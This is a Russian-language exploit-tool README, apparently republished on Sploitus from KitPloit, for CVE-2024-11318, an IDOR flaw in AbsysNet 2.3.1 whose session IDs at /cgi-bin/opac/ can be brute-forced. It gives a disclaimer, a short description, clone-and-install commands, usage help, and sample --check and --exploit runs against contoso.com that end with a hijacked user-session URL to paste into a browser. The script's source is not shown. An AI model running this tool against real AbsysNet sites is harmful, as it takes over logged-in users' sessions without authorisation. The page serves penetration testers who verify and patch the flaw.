Sploitus

Exploit for CVE-2024-11318

kitploit · 2026-08-26

Exploit Code

MARKDOWN149 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-XTHALACH-CVE-2024-11318
# CVE-2024-11318 (IDOR - Угон пользователей AbsysNet 2.3.1)

* * *

# ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ

Этот инструмент предназначен для помощи в выявлении и эксплуатации уязвимости CVE-2024-11318 в приложениях. Он предназначен для использования специалистами по кибербезопасности, исследователями и тестировщиками на проникновение для оценки безопасности в средах, где у них есть явное разрешение.

Если уязвимость подтверждена, эксплуатация должна проводиться только при наличии надлежащего разрешения от владельца приложения или системы.

_**Несанкционированное использование этого инструмента против систем или сетей, которые вам не принадлежат или на тестирование которых у вас нет явного разрешения, является незаконным и неэтичным. Автор не несет ответственности за неправомерное использование или ущерб, причиненный этим инструментом.**_

Используя этот инструмент, вы соглашаетесь соблюдать все соответствующие законы и этические нормы. Всегда убедитесь, что у вас есть явное разрешение, прежде чем проводить тесты или эксплуатировать уязвимости.

* * *

## ОПИСАНИЕ

Эта уязвимость затрагивает AbsysNet версии 2.3.1 и позволяет удаленному злоумышленнику скомпрометировать сеанс активного пользователя. Атака основана на эксплуатации уязвимости IDOR (Insecure Direct Object Reference) в конечной точке /cgi-bin/ocap/, где идентификатор сеанса подвержен перебору.

После успешного подбора идентификатора сеанса, связанного с аутентифицированным пользователем, токен аутентификации раскрывается в HTML-коде. Однако атака ограничена активными сеансами, и если пострадавший пользователь выйдет из системы, доступ злоумышленника немедленно прекращается, что ограничивает устойчивость компрометации.

С помощью этой уязвимости можно перехватить только сеансы пользователей, которые в данный момент вошли в систему, и если текущий пользователь выйдет, злоумышленник теряет соединение.

* * *

## УСТАНОВКА

root@kitploit:~
    
    
    git clone https://github.com/xthalach/CVE-2024-11318.git
    cd CVE-2024-11318
    python3 -m venv cve-2024-11318
    source cve-2024-11318/bin/activate
    pip install -r requirements.txt
    python3 cve-2024-11318.py
    

* * *

## ИСПОЛЬЗОВАНИЕ

root@kitploit:~
    
    
    python3 cve-2024-11318.py 
    
                                                                                                                                                                          
        ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██╗  ██╗       ██╗ ██╗██████╗  ██╗ █████╗ 
        ██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗██║  ██║      ███║███║╚════██╗███║██╔══██╗
        ██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗╚██║╚██║ █████╔╝╚██║╚█████╔╝
        ██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝ ██║ ██║ ╚═══██╗ ██║██╔══██╗
        ╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗     ██║       ██║ ██║██████╔╝ ██║╚█████╔╝
        ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝     ╚═╝       ╚═╝ ╚═╝╚═════╝  ╚═╝ ╚════╝ 
    
        ᴀᴜᴛʜᴏʀ﹕xᴛʜᴀʟᴀᴄʜ ʜᴛᴛᴘs﹕//xᴛʜᴀʟᴀᴄʜ.ɢɪᴛʜᴜʙ.ɪᴏ/
        ɪɴsᴛᴀɢʀᴀᴍ﹕ ﹫xᴛʜᴀʟᴀᴄʜ.ᴛᴡɪᴛᴄʜ
        ᴛᴡɪᴛᴛᴇʀ﹕ ﹫xᴛʜᴀʟᴀᴄʜ
        
    usage: CVE-2024-11318.py [-h] -u URL [--check] [--exploit]
    
    Этот скрипт позволяет оценить, уязвим ли сайт для CVE-2024-11318. В случае подтверждения предоставляется возможность эксплуатации уязвимости, но только при наличии явного разрешения.
    
    options:
      -h, --help         show this help message and exit
      -u URL, --url URL  Целевой URL
      --check            Эта опция позволяет проверить, уязвим ли сайт для CVE-2024-11318.
      --exploit          Эта опция позволяет эксплуатировать уязвимость CVE-2024-11318.
    
    

## \--CHECK

  * Уязвим



root@kitploit:~
    
    
    └─$ python3 CVE-2024-11318.py -u 'https://www.contoso.com/cgi-bin/opac/O7375/ID009a7a6e?ACC=101' --check
                                                                                                                                                                          
        ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██╗  ██╗       ██╗ ██╗██████╗  ██╗ █████╗ 
        ██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗██║  ██║      ███║███║╚════██╗███║██╔══██╗
        ██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗╚██║╚██║ █████╔╝╚██║╚█████╔╝
        ██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝ ██║ ██║ ╚═══██╗ ██║██╔══██╗
        ╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗     ██║       ██║ ██║██████╔╝ ██║╚█████╔╝
        ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝     ╚═╝       ╚═╝ ╚═╝╚═════╝  ╚═╝ ╚════╝ 
    
        ᴀᴜᴛʜᴏʀ﹕xᴛʜᴀʟᴀᴄʜ ʜᴛᴛᴘs﹕//xᴛʜᴀʟᴀᴄʜ.ɢɪᴛʜᴜʙ.ɪᴏ/
        ɪɴsᴛᴀɢʀᴀᴍ﹕ ﹫xᴛʜᴀʟᴀᴄʜ.ᴛᴡɪᴛᴄʜ
        ᴛᴡɪᴛᴛᴇʀ﹕ ﹫xᴛʜᴀʟᴀᴄʜ
        
    [|] НАЧАЛО АТАКИ: ПРОВЕРКА, УЯЗВИМА ЛИ ЦЕЛЬ!
    [*] ПРОВЕРКА URL: https://www.contoso.com/cgi-bin/opac/O7375/?ACC=101
    [+] УЯЗВИМ: Токен 'ID009a7a6e' найден в HTML-коде.
    
    

  * Не уязвим



root@kitploit:~
    
    
    └─$ python3 CVE-2024-11318.py -u 'https://contoso.com/cgi-bin/abnetopac/O7fbxZNd3yjeqX7isbLYjGeEUqX?ACC=101' --check
                                                                                                                                                                          
        ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██╗  ██╗       ██╗ ██╗██████╗  ██╗ █████╗ 
        ██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗██║  ██║      ███║███║╚════██╗███║██╔══██╗
        ██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗╚██║╚██║ █████╔╝╚██║╚█████╔╝
        ██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝ ██║ ██║ ╚═══██╗ ██║██╔══██╗
        ╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗     ██║       ██║ ██║██████╔╝ ██║╚█████╔╝
        ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝     ╚═╝       ╚═╝ ╚═╝╚═════╝  ╚═╝ ╚════╝ 
    
        ᴀᴜᴛʜᴏʀ﹕xᴛʜᴀʟᴀᴄʜ ʜᴛᴛᴘs﹕//xᴛʜᴀʟᴀᴄʜ.ɢɪᴛʜᴜʙ.ɪᴏ/
        ɪɴsᴛᴀɢʀᴀᴍ﹕ ﹫xᴛʜᴀʟᴀᴄʜ.ᴛᴡɪᴛᴄʜ
        ᴛᴡɪᴛᴛᴇʀ﹕ ﹫xᴛʜᴀʟᴀᴄʜ
        
    [q] НАЧАЛО АТАКИ: ПРОВЕРКА, УЯЗВИМА ЛИ ЦЕЛЬ!
    [←] ПРОВЕРКА URL: https://contoso.com/cgi-bin/abnetopac/O7fbxZNd3yjeqX7isbLYjGeEUqX?ACC=101
    [-] НЕ УЯЗВИМ: Приложение исправлено, значение токена "O7fbxZNd3yjeqX7isbLYjGeEUqX" не совпадает.
    
    

## \--EXPLOIT

root@kitploit:~
    
    
    └─$ python3 CVE-2024-11318.py -u 'https://www.contoso.com/cgi-bin/opac/O7067/ID5c22d860?ACC=101' --exploit
                                                                                                                                                                          
        ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██╗  ██╗       ██╗ ██╗██████╗  ██╗ █████╗ 
        ██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗██║  ██║      ███║███║╚════██╗███║██╔══██╗
        ██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗╚██║╚██║ █████╔╝╚██║╚█████╔╝
        ██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝ ██║ ██║ ╚═══██╗ ██║██╔══██╗
        ╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗     ██║       ██║ ██║██████╔╝ ██║╚█████╔╝
        ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝     ╚═╝       ╚═╝ ╚═╝╚═════╝  ╚═╝ ╚════╝ 
    
        ᴀᴜᴛʜᴏʀ﹕xᴛʜᴀʟᴀᴄʜ ʜᴛᴛᴘs﹕//xᴛʜᴀʟᴀᴄʜ.ɢɪᴛʜᴜʙ.ɪᴏ/
        ɪɴsᴛᴀɢʀᴀᴍ﹕ ﹫xᴛʜᴀʟᴀᴄʜ.ᴛᴡɪᴛᴄʜ
        ᴛᴡɪᴛᴛᴇʀ﹕ ﹫xᴛʜᴀʟᴀᴄʜ
        
    [█] НАЧАЛО АТАКИ: ЭКСПЛУАТАЦИЯ ЦЕЛИ!
    [*] --- ЗАПУСК ЭКСПЛОЙТА ---
    [b] URL: https://www.contoso.com/cgi-bin/opac/O7099/?ACC=101
    [+] Угон токена пользователя: https://www.contoso.com/cgi-bin/opac/O7054/ID9f842d80?ACC=101 (СКОПИРУЙТЕ И ВСТАВЬТЕ В БРАУЗЕР)